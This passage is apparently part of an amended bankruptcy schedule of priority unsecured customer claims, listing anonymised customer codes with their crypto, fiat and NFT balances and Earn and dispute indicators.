| 07364708 | | DOGE[1], LINK[.79551341], TRX[206.51594994], USD[0.00] | | |
| 07364709 | | USD[10.00] | | |
| 07364710 | | USD[20.00] | | |
| 07364711 | | USD[10.00] | | |
| 07364712 | | USD[1.11], USDT[0.00000001] | | |
| 07364714 | | USD[10.00] | | |
| 07364715 | | USD[10.00] | | |
| 07364716 | | USD[10.00] | | |
| 07364717 | | CUSDT[1], DOGE[4020.70278216], TRX[2868.86339361], USD[28.11] | | |
| 07364718 | | USD[10.00] | | |
| 07364719 | | USD[10.00] | | |
| 07364720 | | ETH[.0009805], ETHW[.0009805], USD[0.00], USDT[33.44474466] | | |
| 07364721 | | USD[10.00] | | |
| 07364723 | | BTC[0], USD[0.00], USDT[0.00003318] | | |
| 07364724 | | CUSDT[1], DOGE[2469.05760672], GRT[1], LTC[.30032738], USD[0.00] | | |
| 07364727 | | USD[10.00] | | |
| 07364728 | | BTC[.00005326], USD[96.67] | | |
| 07364730 | | BRZ[1], CUSDT[1], TRX[3], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07364731 | | USD[10.00] | | |
| 07364732 | | USD[10.00] | | |
| 07364733 | | USD[10.00] | | |
| 07364734 | | USD[10.00] | | |
| 07364736 | | USD[0.01], USDT[0] | | |
| 07364740 | | CUSDT[1], DOGE[1], TRX[.00408028], USD[0.01] | | |
| 07364741 | | USD[0.00] | | |
| 07364742 | | DOGE[1678.60564396], TRX[1], USD[10.90] | Yes | |
| 07364743 | | BAT[1.01655549], BRZ[1], CUSDT[2], GRT[1.00367791], TRX[4], USD[0.00], USDT[1.09175836] | Yes | |
| 07364744 | | BTC[.00003413], USD[0.00] | | |
| 07364745 | | USD[10.00] | | |
| 07364746 | | USD[0.01] | | |
| 07364747 | | BRZ[0.00000246], LTC[0], USD[0.00] | | |
| 07364748 | | CUSDT[1], DOGE[.0277216], USD[0.00] | | |
| 07364749 | | CUSDT[2], DOGE[1.00002366], TRX[1], USD[0.00] | | |
| 07364750 | | USD[10.00] | | |
| 07364751 | | USD[10.00] | | |
| 07364752 | | CUSDT[2], DOGE[1], USD[0.01] | | |
| 07364753 | | BAT[1.0165555], BF_POINT[100], BRZ[1], CUSDT[2], TRX[3], USD[0.01] | Yes | |
| 07364755 | | USD[10.00] | | |
| 07364756 | | USD[10.00] | | |
| 07364758 | | USD[10.00] | | |
| 07364759 | | USD[10.00] | | |
| 07364760 | | TRX[1], USD[0.00] | | |
| 07364761 | | CUSDT[2], DOGE[1.00098232], LTC[.00000001], USD[0.66] | | |
| 07364762 | | CUSDT[1], TRX[1642.56383134], USD[0.00] | | |
| 07364764 | | USD[10.00] | | |
| 07364765 | | BAT[3], BRZ[1], BTC[0.13659264], CUSDT[1], ETH[.47960223], ETHW[.47960223], SUSHI[1], UNI[.29748231], USD[0.00], YFI[0] | | |
| 07364766 | | DOGE[237.03648945], USD[0.00] | | |
| 07364767 | | USD[10.60] | Yes | |
| 07364768 | | USD[10.00] | | |
| 07364769 | | USD[10.00] | | |
| 07364770 | | USD[10.00] | | |
| 07364773 | | USD[10.00] | | |
| 07364774 | | DOGE[0], USD[0.00] | | |
| 07364776 | | CUSDT[2], DAI[.99400997], ETH[.00238624], ETHW[.00238624], USD[0.88] | | |
| 07364777 | | BAT[1], BRZ[1.59757541], CUSDT[3], DOGE[5.05035895], SHIB[2], SOL[.00472375], TRX[93.18894081], USD[0.77] | Yes | |
| 07364779 | | CUSDT[2], DOGE[3581.53177905], SHIB[1344573.97354091], TRX[1], USD[0.00] | Yes | |
| 07364780 | | USD[10.00] | | |
| 07364782 | | USD[10.00] | | |
| 07364783 | | DOGE[29.3789713], USD[0.00] | | |
| 07364784 | | BRZ[1], CUSDT[13], DOGE[7974.03370238], TRX[5], USD[0.00] | Yes | |
| 07364785 | | BCH[0], BRZ[0.00000004], BTC[0], DOGE[0], ETH[0], ETHW[0], SOL[0], TRX[0], UNI[0], USD[0.01], USDT[0.00000045] | | |
| 07364788 | | BRZ[1], SOL[0], TRX[116.97803076], USD[356.40], USDT[0] | Yes | |
| 07364789 | | USD[10.00] | | |
| 07364790 | | BRZ[1], CUSDT[1], TRX[1], USD[0.00] | Yes | |
| 07364792 | | USD[10.00] | | |
| 07364793 | | USD[10.00] | | |
| 07364794 | | USD[8.05] | | |
| 07364796 | | CUSDT[4], DOGE[31.90782275], USD[0.00] | Yes | |
| 07364797 | Contingent, Disputed | USD[0.01] | | |
| 07364798 | | USD[650.41] | | |
| 07364799 | | USD[10.00] | | |
| 07364800 | | CUSDT[2], DOGE[1], TRX[.00000616], USD[0.00], USDT[20.24628133] | | |
| 07364801 | | BRZ[1], BTC[0], CUSDT[7], DOGE[46.93597879], ETH[0.00001437], ETHW[1.96321906], NFT [434244732739713841/Earl Campbell's Playbook: Rice vs. Texas - October 1st, 1977 #11][1], SHIB[40.50306691], SOL[.13561466], TRX[2], USD[0.00], USDT[0.00009090] | Yes | |
| 07364802 | | BCH[0], BTC[0], CUSDT[3], DOGE[19.31223101], ETH[0], LTC[0], TRX[0], USD[0.00] | Yes | |
| 07364803 | | BTC[.00023701], CUSDT[1], DAI[19.78926001], DOGE[483.93562314], ETH[.00597564], ETHW[.00597564], GRT[10.57973409], LTC[.01261487], SOL[1.46986192], UNI[.09982895], USD[1.86], USDT[10.93291826] | Yes | |
| 07364805 | | USD[0.01], USDT[0] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07364806 | Contingent, Disputed | ETH[.00000001], USD[0.01], USDT[.00000001] | Yes | |
| 07364807 | | USD[10.00] | | |
| 07364809 | | CUSDT[2], USD[0.00] | Yes | |
| 07364811 | | USD[10.00] | | |
| 07364812 | | USD[10.00] | | |
| 07364814 | | USD[10.00] | | |
| 07364815 | | BTC[.00000301], ETHW[.000641], NEAR[.0827], NFT (298373700436564622/JOIN THE DARK SIDE BEANIE #1)[1], NFT (300756554757558760/Fun X Snoopy Mars Landing Gold #2)[1], NFT (305505659419482993/Fun X Snoopy Mars Landing Black #1)[1], NFT (319422856788418689/Saudi Arabia Ticket Stub #120)[1], NFT (328109454697025005/Marsper Holliday Collection Star #10)[1], NFT (370223909638445151/Entrance Voucher #3848)[1], NFT (375340550679174039/Fun X Snoopy Mars Landing Silver #2)[1], NFT (382179390172633656/Erosion Marsper #1)[1], NFT (413908132673599651/TIE FIGHTER SNAPBACK #10)[1], NFT (465331329790607923/FTX - Off The Grid Miami #5098)[1], NFT (501807217957456359/FIRST ORDER SNAPBACK #10)[1], NFT (530165645022256346/Romeo #1110)[1], NFT (544940908509928525/Fun X Peanuts 70 Years Collection #2)[1], NFT (558590825854369166/SITH TROOPER TEE #1)[1], SOL[.008635], USD[0.00] | | |
| 07364816 | | TRX[84.20861671], USD[0.00] | Yes | |
| 07364817 | | BRZ[1], ETH[.00000001], ETHW[0], SOL[0.00521914], USD[0.00] | | |
| 07364818 | | BRZ[1], CUSDT[2], DOGE[1], USD[0.00] | | |
| 07364820 | | BAT[1], BRZ[1], CUSDT[1], DOGE[.00077761], TRX[1], USD[0.01] | | |
| 07364821 | | USD[0.00], USDT[0] | | |
| 07364822 | | CUSDT[1], TRX[1], USD[0.01], USDT[0] | | |
| 07364824 | | USD[10.00] | | |
| 07364825 | | USD[0.00] | | |
| 07364826 | | USD[10.00] | | |
| 07364827 | | USD[10.00] | | |
| 07364828 | | USD[10.00] | | |
| 07364830 | | USD[10.00] | | |
| 07364831 | | CUSDT[1], DOGE[33.10836550], TRX[121.82138342], USD[0.00] | Yes | |
| 07364832 | | CUSDT[2], USD[0.00] | | |
| 07364833 | | USD[10.00] | | |
| 07364834 | | BAT[1.0165555], BRZ[3], CUSDT[3], DAI[10.95611689], GRT[2.07497824], LINK[.07956755], TRX[3], UNI[1.06730546], USD[0.00], USDT[5.48954864] | Yes | |
| 07364835 | | DOGE[1], USD[0.00] | | |
| 07364836 | | BRZ[1], BTC[.00028166], CUSDT[1], DOGE[9], USD[10.00] | | |
| 07364837 | | BTC[.00020426], USD[0.00] | | |
| 07364838 | | TRX[1], USD[0.00] | Yes | |
| 07364839 | | BAT[1], BRZ[1], CUSDT[60], DOGE[1], TRX[11], USD[0.00] | | |
| 07364840 | | CUSDT[1], DOGE[.00455001], SOL[0], USD[0.00], USDT[0] | Yes | |
| 07364841 | | USD[10.00] | | |
| 07364842 | | BTC[.0000534], DOGE[24.38289950], USD[0.00] | | |
| 07364843 | | BTC[0.00001294], USD[1.89] | | |
| 07364844 | | CUSDT[1], DOGE[134.33125334], USD[0.00] | | |
| 07364845 | | USD[10.00] | | |
| 07364846 | | BTC[0], ETH[.00000001], SOL[0], USD[0.00] | | |
| 07364847 | | USD[10.00] | | |
| 07364848 | | BAT[1], BRZ[2], CUSDT[8], DOGE[5], ETH[.0000023], ETHW[.1730023], LINK[.13453201], LTC[.00001562], SHIB[6], SOL[.22293692], SUSHI[.9839918], TRX[5], USD[0.01] | | |
| 07364849 | | USD[10.00] | | |
| 07364850 | | USD[10.00] | | |
| 07364851 | | CUSDT[20], DOGE[167.41186603], GRT[25.01137892], KSHIB[214.22358944], SHIB[214133.76231263], TRX[160.41031675], USD[0.04] | | |
| 07364852 | | ETH[.00220836], USD[0.34] | | |
| 07364853 | | DOGE[23.85065024], SUSHI[.00047688], USD[0.10] | | |
| 07364854 | | CUSDT[422.03145207], DOGE[57.63808744], USD[0.00] | | |
| 07364855 | | BF_POINT[100], DOGE[1], USD[0.00] | Yes | |
| 07364856 | | USD[0.00] | | |
| 07364857 | | DOGE[2], USD[0.00] | | |
| 07364858 | | USD[10.00] | | |
| 07364859 | | USD[10.00] | | |
| 07364860 | | USD[0.00] | | |
| 07364861 | | USD[0.00] | | |
| 07364863 | | AUD[0.00], BRZ[1], CAD[0.00], CUSDT[3], DOGE[9.5693639], EUR[0.00], GRT[0], LTC[0], USD[0.01], USDT[0] | Yes | |
| 07364864 | | USD[10.00] | | |
| 07364866 | | DOGE[1739.83959003], USD[0.00] | | |
| 07364867 | | USD[10.00] | | |
| 07364868 | | CUSDT[1], USD[11.28] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07364869 | | USD[10.00] | | |
| 07364870 | | CUSDT[2], DOGE[1115.40660045], ETH[.03029667], ETHW[.03029667], USD[0.00] | | |
| 07364871 | | TRX[.10305854], USD[0.86] | | |
| 07364872 | | USD[10.00] | | |
| 07364873 | | DOGE[0], NFT (375577191031086098/Entrance Voucher #1828)[1], TRX[13494.4858182], USD[0.00] | | |
| 07364874 | | USD[10.00] | | |
| 07364875 | | BAT[1], USD[0.11] | | |
| 07364876 | | DOGE[.871], USD[0.01] | | |
| 07364877 | | CUSDT[10], DOGE[4560.38285676], ETH[.05774037], ETHW[.05774037], TRX[2], USD[0.00] | | |
| 07364878 | | CUSDT[2], DOGE[1110.13971337], USD[0.00] | | |
| 07364879 | | USD[10.00] | | |
| 07364881 | | USD[10.00] | | |
| 07364882 | | DOGE[5.00039524], USD[193.40] | | |
| 07364883 | | AUD[12.94], DOGE[1], USD[0.00] | | |
| 07364884 | | BAT[.00620025], BRZ[2], CUSDT[2], DOGE[6.07788165], GRT[4.13367103], LINK[26.64370742], NFT (323247773807605094/Joe Theismann's Playbook: Washington vs. Chicago Bears - September 29, 1985 #64)[1], NFT (403318730459886798/Marcus Allen's Playbook: Seattle Seahawks vs. Los Angeles Raiders - October 7, 1984 #43)[1], NFT (452783671636992325/Joe Theismann's Playbook: Washington vs. Chicago Bears - September 29, 1985 #38)[1], NFT (558805469024111517/Marcus Allen's Playbook: Los Angeles Raiders vs. Washington - January 22, 1984 #51)[1], SOL[.00066729], TRX[11.10227414], USD[20957.61], USDT[4.25633075] | Yes | |
| 07364885 | | BRZ[2], CUSDT[7], DOGE[2], SHIB[3], SOL[0], TRX[5], USD[0.00], USDT[1.04873935] | Yes | |
| 07364886 | | USD[0.00], USDT[0] | | |
| 07364887 | | USD[10.00] | | |
| 07364888 | | DOGE[339.23830034], SHIB[522812.81409243], TRX[1], USD[0.08] | Yes | |
| 07364889 | | USD[0.00] | | |
| 07364890 | | BRZ[1], BTC[0], CUSDT[2], DOGE[2], ETH[.00000002], ETHW[.00000002], LINK[0.00004382], NFT (337191220715390758/What do you see?)[1], NFT (340643494793263259/Joe Theismann's Playbook: Notre Dame vs. USC - November 30, 1968 #45)[1], NFT (368895767011520150/Shannon Sharpe's Playbook: Denver Broncos vs. Los Angeles Raiders - January 9, 1994 #43)[1], NFT (393003596072236483/Computer Generated Dino CGD # 2 of 500 )[1], NFT (407528728359492247/LSD is bad)[1], NFT (438542210054552509/Colorflow #5)[1], NFT (439624741472725873/Pixel Truck #1)[1], NFT (507146818981912152/Joe Theismann's Playbook: Washington vs. Chicago Bears - September 29, 1985 #52)[1], NFT (575091773067277738/Cosmo view)[1], SHIB[4], SOL[.00000137], USD[10.76] | Yes | |
| 07364891 | | BTC[.00021193], USD[0.00] | | |
| 07364893 | | USD[0.00] | | |
| 07364894 | | BRZ[1], CUSDT[2], DOGE[4062.65711027], TRX[5], USD[0.00] | | |
| 07364895 | | USD[10.00] | | |
| 07364896 | | CUSDT[3], DOGE[1], ETH[0], ETHW[0], SHIB[3], USD[886.22] | Yes | |
| 07364897 | | BCH[.00114363], DOGE[.97316961], ETH[.00006415], ETHW[.00006415], USD[0.00] | | |
| 07364898 | | USD[10.00] | | |
| 07364899 | | ETH[0], USD[0.00], USDT[0] | | |
| 07364900 | | USD[10.00] | | |
| 07364901 | | USD[0.00] | | |
| 07364902 | | DOGE[907.05562275], USD[10.00] | | |
| 07364903 | | USD[10.00] | | |
| 07364904 | | USD[10.00] | | |
| 07364905 | | USD[10.00] | | |
| 07364906 | | USD[10.00] | | |
| 07364907 | | BTC[.00019739], USD[0.00] | | |
| 07364908 | | USD[10.00] | | |
| 07364909 | Contingent, Disputed | BCH[.00001822], BRZ[3], CUSDT[1.43215174], DOGE[6434.96621841], TRX[.886951], USD[0.30], USDT[0.04060636] | Yes | |
| 07364911 | | USD[10.00] | | |
| 07364912 | | DOGE[2], ETH[3.61463853], ETHW[3.61312036], LTC[2.35755081], SHIB[4], SOL[75.27101214], TRX[2], USD[0.74], USDT[1.02541950] | Yes | |
| 07364913 | | USD[10.00] | | |
| 07364914 | | USD[10.00] | | |
| 07364917 | | DOGE[1], TRX[2], USD[0.00] | | |
| 07364918 | | USD[10.00] | | |
| 07364919 | | ETH[.00283662], ETHW[.00283662], USD[0.00] | | |
| 07364920 | | CUSDT[156.8361263], TRX[1], USD[0.00] | | |
| 07364921 | | USD[10.00] | | |
| 07364922 | | DOGE[32.29205905], USD[0.00] | Yes | |
| 07364923 | | BTC[0.02570542], DOGE[17976.15578785], ETH[0.12925120], ETHW[0.12816747], TRX[11940.85299390], USD[5740.71] | Yes | |
| 07364924 | | BTC[0], ETH[0], SOL[0], SUSHI[.1815], USD[1.15] | | |
| 07364925 | | BAT[1.01655549], BRZ[3], CUSDT[2], NFT (394979844570722323/Flyby )[1], NFT (407906140113684186/Think  #2)[1], NFT (442826099550216943/Winners)[1], NFT (571239264839798562/Hall of Fantasy League #10)[1], USD[0.01] | Yes | |
| 07364926 | | CUSDT[1], DOGE[1304.41657546], TRX[359.22054937], USD[0.00] | | |
| 07364927 | | GRT[4.44289209], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07364929 | | USD[10.00] | | |
| 07364931 | | BTC[0], CUSDT[1], DOGE[0], SOL[0, USD[0.00], USDT[0] | | |
| 07364932 | | ETHW[.00000257], NFT (377279060874330050/Entrance Voucher #3534)[1], SHIB[36], USD[5.12] | Yes | |
| 07364933 | | CUSDT[3], USD[0.00], USDT[1.07865118] | Yes | |
| 07364935 | | USD[10.00] | | |
| 07364936 | | USD[10.00] | | |
| 07364937 | | USD[10.00] | | |
| 07364938 | | USD[10.00] | | |
| 07364939 | | USD[10.00] | | |
| 07364940 | | USD[10.00] | | |
| 07364942 | | NFT (369049056946933467/Earl Campbell's Playbook: Texas vs. Houston - November 5th, 1977 #33)[1], SHIB[2, SOL[.11208098], TRX[1], USD[0.00] | Yes | |
| 07364943 | | USD[0.00] | | |
| 07364945 | | DOGE[1], USD[0.01] | | |
| 07364946 | | BRZ[1], CUSDT[1], DOGE[1], ETHW[.53764177], LTC[7.00382018], NFT (323960045742080561/5867)[1], SOL[1.151623], TRX[85.15813978], USD[0.00], USDT[0.00002680] | | |
| 07364948 | | USD[10.00] | | |
| 07364949 | | DOGE[0], ETH[0], LINK[0], MATIC[1911.75884502], SOL[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07364950 | | BTC[.00013371], DOGE[151.96261233], ETH[.0030173], ETHW[.0030173], USD[15.00] | | |
| 07364951 | | CUSDT[1], DOGE[405.95938389], SOL[.40872386], USD[0.85] | | |
| 07364952 | | CUSDT[2], DOGE[.73408622], USD[0.00] | | |
| 07364953 | | DOGE[1], SUSHI[3.5309288], USD[11.04] | Yes | |
| 07364954 | | AUD[0.00], BCH[41.32593109], BTC[0.00000001], CAD[0.00], GBP[0.00], USD[24994.00], USDT[0] | | |
| 07364955 | | BTC[0], ETH[.00073984], ETHW[4.17873984], MKR[.000032], SOL[.003295], SUSHI[.0515], UNI[.0867], USD[6653.50], YFI[.00093] | | |
| 07364956 | | USD[10.00] | | |
| 07364957 | | USD[10.00] | | |
| 07364958 | | USD[10.00] | | |
| 07364959 | | CUSDT[2], DOGE[1], TRX[0], USD[0.00] | | |
| 07364961 | | USD[10.00] | | |
| 07364962 | | DOGE[4], TRX[1], USD[0.01] | | |
| 07364963 | | BAT[0], CUSDT[7], DOGE[44.78189934], SGD[0.00], TRX[1], UNI[0.42210840], USD[0.00] | Yes | |
| 07364965 | | BRZ[.9849664], CUSDT[2], DOGE[20.63786691], TRX[87.13228963], USD[0.08], USDT[0] | | |
| 07364966 | | USD[10.00] | | |
| 07364967 | | USD[10.00] | | |
| 07364968 | | USD[10.00] | | |
| 07364969 | | TRX[104.59574234], USD[0.00] | Yes | |
| 07364970 | | USD[10.00] | | |
| 07364971 | | BTC[0], DOGE[1.08014056], USD[0.00] | | |
| 07364974 | | USD[10.00] | | |
| 07364975 | | BTC[.00002675], DOGE[206.23556864], ETH[.00794405], ETHW[.00794405], GRT[.24508602], TRX[1], USD[28.00] | | |
| 07364976 | | CUSDT[8], SOL[.07958008], USD[0.00] | Yes | |
| 07364977 | | USD[10.00] | | |
| 07364978 | | DOGE[0], EUR[0.00], GBP[0.00], SOL[0], USD[0.01] | | |
| 07364979 | | SOL[1.21247295], USD[0.00] | Yes | |
| 07364980 | | USD[10.00] | | |
| 07364981 | | USD[10.00] | | |
| 07364983 | | DOGE[300981.22044163], TRX[2], USD[1.69] | | |
| 07364985 | | TRX[178.77980281], USD[0.00] | | |
| 07364986 | | BTC[.00017568], USD[0.00] | | |
| 07364987 | | DOGE[1], ETH[.06504626], ETHW[.06423855], USD[119.80] | Yes | |
| 07364988 | | BTC[0], USD[4.15] | | |
| 07364991 | | USD[10.00] | | |
| 07364994 | | BTC[0], DOGE[ 187], USD[0.00] | | |
| 07364996 | | BAT[0], DOGE[0], SHIB[97664087.37949883], TRX[0], USD[0.00], USDT[0] | | |
| 07364997 | | DOGE[100.15853417], USD[8.89] | | |
| 07364998 | | USD[0.00] | | |
| 07365000 | | BTC[0], CUSDT[2], DOGE[1], GRT[1], TRX[1], USD[0.00] | | |
| 07365001 | | USD[10.00] | | |
| 07365002 | | DOGE[327.2759745], SHIB[1392215.16991263], USD[0.00] | Yes | |
| 07365004 | | USD[10.00] | | |

Amended Schedule F-12 priority Unsecured Customer Claims

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07365005 | | USD[0.00] | | |
| 07365006 | | USD[10.00] | | |
| 07365007 | | BAT[1.0165555], BCH[.10149868], CUSDT[4], DOGE[22867.43894513], ETH[.14299338], ETHW[.14208915], GRT[2.07666511], SHIB[2], TRX[66.28284017], USD[45.18] | Yes | |
| 07365008 | | USD[0.00] | | |
| 07365009 | | USD[10.00] | | |
| 07365011 | | BTC[0], CUSDT[1], DOGE[1.00004899], TRX[1.00004278], USD[0.01] | | |
| 07365012 | | USD[10.00] | | |
| 07365013 | | BRZ[3], CUSDT[18], DOGE[1], GRT[1.00310987], TRX[5], USD[0.00], USDT[0] | Yes | |
| 07365014 | | USD[20.87] | | |
| 07365015 | | BF_POINT[100], BTC[0], CUSDT[5], DOGE[0], LINK[0], LTC[0], SHIB[1232484.94452392], SOL[0], USD[0.00], USDT[0.00043810] | Yes | |
| 07365016 | | CUSDT[2], DOGE[1416.14481743], ETH[.00107682], ETHW[.00106314], SHIB[493781.34205229], TRX[338.67031142], USD[-25.00] | Yes | |
| 07365017 | | BTC[.00021473], USD[0.00] | | |
| 07365018 | | BTC[.00095314], USD[0.10] | Yes | |
| 07365019 | | USD[10.00] | | |
| 07365020 | | USD[10.00] | | |
| 07365021 | | USD[10.00] | | |
| 07365022 | | USD[10.91] | Yes | |
| 07365023 | | USD[10.00] | | |
| 07365024 | | BRZ[1], CUSDT[1], DOGE[4977.10501918], GRT[1], LINK[1], TRX[5], USD[0.00] | | |
| 07365025 | | BAT[2.11987824], BRZ[8.78057553], CUSDT[35], DOGE[5.65318133], GRT[1.00408127], LINK[.00002255], SOL[0.00000001], SUSHI[.0743299], TRX[22.02841358], UNI[.00004878], USD[0.00], USDT[0.00000119] | Yes | |
| 07365026 | | USD[10.00] | | |
| 07365027 | | USD[10.00] | | |
| 07365032 | | USD[10.00] | | |
| 07365033 | | TRX[67.06629684], USD[0.00] | | |
| 07365034 | | USD[10.88] | Yes | |
| 07365035 | | BRZ[1], DOGE[.00004196], SHIB[628404.25497225], TRX[166.61985684], USD[87.57] | Yes | |
| 07365036 | | DOGE[1], USD[0.00] | | |
| 07365037 | | DOGE[1], TRX[1], USD[0.01] | | |
| 07365038 | | BRZ[1], BTC[.00076854], CUSDT[11], DOGE[680.11246873], ETH[.00663945], ETHW[.00663945], SUSHI[1.26120255], TRX[1], USD[0.00] | | |
| 07365039 | | CUSDT[2], DOGE[1], USD[0.01], USDT[0] | Yes | |
| 07365040 | | USD[0.00] | | |
| 07365042 | | USD[10.00] | | |
| 07365043 | | USD[10.00] | | |
| 07365044 | | USD[3.29] | | |
| 07365045 | | CUSDT[2], USD[0.00] | | |
| 07365046 | | USD[10.00] | | |
| 07365047 | | USD[0.00] | | |
| 07365050 | | USD[10.00] | | |
| 07365054 | | USD[0.00] | Yes | |
| 07365055 | | USD[10.00] | | |
| 07365056 | | BTC[.00010074], USD[0.00], USDT[4.97004993] | | |
| 07365057 | | DOGE[27.74476008], USD[0.00] | | |
| 07365058 | | BAT[1.00634792], DAI[.00000001], DOGE[4], SHIB[1], USD[1960.83], USDT[0] | Yes | |
| 07365059 | | DOGE[1], USD[0.00] | | |
| 07365060 | | CUSDT[1], GRT[3.89516137], LTC[.04359281], MATIC[2.54473478], USD[0.00] | Yes | |
| 07365061 | | BRZ[1], BTC[.00000555], CUSDT[1], GRT[3.0196102], TRX[1], USD[-0.20] | Yes | |
| 07365062 | | DOGE[51158.73650227], GRT[730.50595011], SOL[316.14996074], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07365063 | | USD[10.00] | | |
| 07365064 | | BTC[.00008039], DOGE[2], ETH[.00023149], ETHW[.00078214], GRT[1], SHIB[2], SOL[.00062776], TRX[3], USD[26.48] | Yes | |
| 07365066 | | USD[0.00] | | |
| 07365067 | | TRX[142.96338507], USD[10.00] | | |
| 07365068 | | USD[0.00] | | |
| 07365069 | | USD[10.00] | | |
| 07365070 | | SOL[3.3836], USD[3.48] | | |
| 07365071 | | DOGE[149.3287447], USD[1.20] | | |
| 07365072 | | DOGE[141.09602261], USD[0.00] | | |
| 07365073 | | DOGE[145.65196239], USD[0.00] | Yes | |
| 07365074 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07365075 | | USD[10.00] | | |
| 07365076 | | USD[10.00] | | |
| 07365078 | | USD[10.00] | | |
| 07365079 | | USD[10.00] | | |
| 07365080 | | USD[10.00] | | |
| 07365082 | | BRZ[1], CUSDT[7], DOGE[.84977992], MATIC[.00003845], TRX[3], USD[265.48] | Yes | |
| 07365083 | | USD[10.00] | | |
| 07365084 | | USD[10.81] | Yes | |
| 07365086 | | DOGE[3], LINK[3.11778663], TRX[1], USD[0.00], USDT[.00008775] | | |
| 07365087 | | USD[10.52] | Yes | |
| 07365088 | | CUSDT[8], DOGE[.09359301], GRT[1], TRX[3], USD[0.31] | | |
| 07365089 | | DOGE[386.228], LTC[.00959752], SUSHI[1.494], USD[116.14] | | |
| 07365090 | | BAT[23.34652981], BTC[.00878852], CUSDT[3], DOGE[486.44046883], ETH[.17776796], ETHW[.1775201], GRT[.00007087], LTC[1.84235314], SUSHI[2.01764889], TRX[510.20208789], USD[0.01] | Yes | |
| 07365091 | | BTC[0], USD[2.38] | | |
| 07365092 | | SOL[0], SUSHI[0], USD[0.35] | | |
| 07365093 | | CUSDT[2], DOGE[111.87045285], GRT[1], TRX[1], USD[0.00] | | |
| 07365094 | | DOGE[1], USD[0.00] | | |
| 07365095 | | CUSDT[1], DOGE[724.85862485], GRT[1], SOL[1.08891269], TRX[2], USD[0.87] | | |
| 07365096 | | USD[0.01] | | |
| 07365097 | | USD[10.00] | | |
| 07365098 | | USD[0.00] | | |
| 07365099 | | USD[10.00] | | |
| 07365100 | | USD[10.00] | | |
| 07365101 | | CUSDT[1], TRX[1], USD[0.03] | | |
| 07365102 | | CUSDT[7], DAI[.01290318], DOGE[21.62602658], GBP[7.78], GRT[1.00498957], SGD[1.31], SUSHI[6.64575266], TRX[428.35559594], USD[55.92], USDT[1.10332489] | Yes | |
| 07365103 | | USD[10.00] | | |
| 07365104 | | USD[10.00] | | |
| 07365106 | | USD[0.00] | | |
| 07365107 | | USD[10.00] | | |
| 07365108 | | BRZ[1], CUSDT[7], DOGE[1516.28179159], SHIB[158801.03490344], USD[0.04] | Yes | |
| 07365110 | | USD[0.00] | | |
| 07365111 | | DOGE[.00694497], USD[0.15] | | |
| 07365112 | | USD[10.00] | | |
| 07365113 | | SUSHI[.69287903], USD[0.00] | Yes | |
| 07365114 | | USD[0.00] | | |
| 07365117 | | USD[10.00] | | |
| 07365118 | | CUSDT[6], DOGE[43.67163556], USD[0.00] | | |
| 07365119 | | DOGE[165.14416611], USD[0.00] | Yes | |
| 07365121 | | DOGE[0.61765345], USD[0.00] | | |
| 07365122 | | USD[10.00] | | |
| 07365123 | | BAT[0], BTC[0], DOGE[0], ETH[0], SOL[0], TRX[0], USD[0.82], USDT[0] | | |
| 07365124 | | BAT[44.22923794], BRZ[136.28808379], CUSDT[2370.47126626], DOGE[3048.31578831], TRX[470.99185323], USD[2.65] | | |
| 07365125 | | USD[10.00] | | |
| 07365126 | | BAT[80.56029538], BTC[.00478024], CUSDT[.01075194], DOGE[650.86395048], ETH[.08470066], ETHW[.08366711], GRT[89.90932934], KSHIB[1433.87994331], MATIC[20.45071437], NFT [315493644808969550/Earl Campbell's Playbook: Rice vs. Texas – October 1st, 1977 #95][1], SHIB[5335.52805232], SOL[.22345659], SUSHI[3.56243466], TRX[943.40613216], USD[0.00] | Yes | |
| 07365127 | | USD[10.00] | | |
| 07365128 | | DOGE[139.18480632], USD[0.00] | Yes | |
| 07365132 | | USD[10.00] | | |
| 07365133 | | BRZ[1], CUSDT[4], DOGE[1], ETH[0], GRT[1.00128843], TRX[4], USD[0.01] | | |
| 07365134 | | USD[10.00] | | |
| 07365135 | | DOGE[3541.17373047], USD[0.00] | Yes | |
| 07365136 | | USD[10.00] | | |
| 07365137 | | LINK[.0026], MATIC[1.16], NFT [338477715430545398/FTX – Off The Grid Miami #2049][1], SOL[.0028], TRX[.000005], UNI[.0928], USD[226.62], USDT[0] | | |
| 07365138 | | USD[10.00] | | |
| 07365139 | | USD[10.00] | | |
| 07365141 | | USD[10.00] | | |
| 07365142 | | BAT[1.01655549], BRZ[1], BTC[.00724001], CUSDT[6], DOGE[550.66499032], ETH[.18458437], ETHW[.18434368], LINK[5.39290665], MATIC[72.53807901], TRX[2], USD[0.00] | Yes | |
| 07365143 | | GRT[4.49213084], USD[0.00] | | |
| 07365144 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07365145 | | USD[10.00] | | |
| 07365146 | | USD[10.00] | | |
| 07365147 | | USD[0.00] | | |
| 07365148 | | USD[10.00] | | |
| 07365149 | | SHIB[1], TRX[1], USD[0.01] | Yes | |
| 07365150 | | BCH[.00763492], BRZ[1], CUSDT[8], DOGE[242.19541799], GRT[6.06499964], LINK[.23146816], PAXG[.0029263], SUSHI[.70701377], TRX[246.4415658], UNI[.32672822], USD[0.00] | Yes | |
| 07365152 | | CUSDT[14], DOGE[0], TRX[2], USD[0.00] | Yes | |
